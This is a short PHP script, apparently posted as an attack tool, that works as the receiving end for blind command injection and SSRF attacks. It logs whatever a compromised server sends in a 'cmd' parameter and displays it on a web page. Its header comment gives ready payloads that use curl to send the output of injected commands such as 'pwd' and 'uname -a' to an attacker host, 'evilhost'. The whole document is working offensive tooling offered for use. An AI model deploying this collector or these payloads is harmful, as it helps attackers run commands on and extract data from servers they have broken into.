Command Output Recorder (Blind RCE & SSRF)

1. <?php
2. /*
3.     BLIND COMMAND INJECTION - OUTPUT RECORDER WITH CURL (WEB BASED)
4.     Coded By ZeroByte.ID (Schopath)
5.  
6.     [+] Payload :
7.     # curl -s "http://evilhost/cmd-read.php?cmd=$(pwd)";
8.     # curl -s --data-urlencode "cmd=$(uname -a)" -X POST "http://evilhost/cmd-read.php"
9. */
10.  
11. error_log(0);
12. error_reporting(0);
13.  
14. $file = "cmdrec_".md5(date("Ymd")).".log";
15.  
16. if(!file_exists($file)) {
17.     file_put_contents("$file", "");
18. }
19.  
20. if(isset($_GET['cmd'])) {
21.     $record = $_GET['cmd'];
22.     $addcread = fopen($file, "a") or die("Failed open to open file!");
23.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
24.     fwrite($addcread, $record."\n");
25.     fwrite($addcread, "----------------------------------------\n");
26.     fclose($addcread);
27. }
28. else if (isset($_POST['cmd'])) {
29.     $record = $_POST['cmd'];
30.     $addcread = fopen($file, "a") or die("Failed open to open file!");
31.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
32.     fwrite($addcread, $record."\n");
33.     fwrite($addcread, "----------------------------------------\n");
34.     fclose($addcread);
35. }
36. else {
37.     echo "<pre>\n";
38.     echo "<b><big>##### BLIND COMMAND INJECTION - OUTPUT RECORDER #####</big></b><br>\n";
39.     print_r(file_get_contents($file));
40.     echo "</pre>\n";
41.     echo "<form method=\"post\"><input type=\"submit\" name=\"reset\" value=\"Reset Log\"></form>";
42.     if(isset($_POST['reset'])) {
43.         $addcread = fopen($file, "w") or die("Failed open to open file!");
44.         fwrite($addcread, "");
45.         fclose($addcread);
46.     }
47. }
48. ?>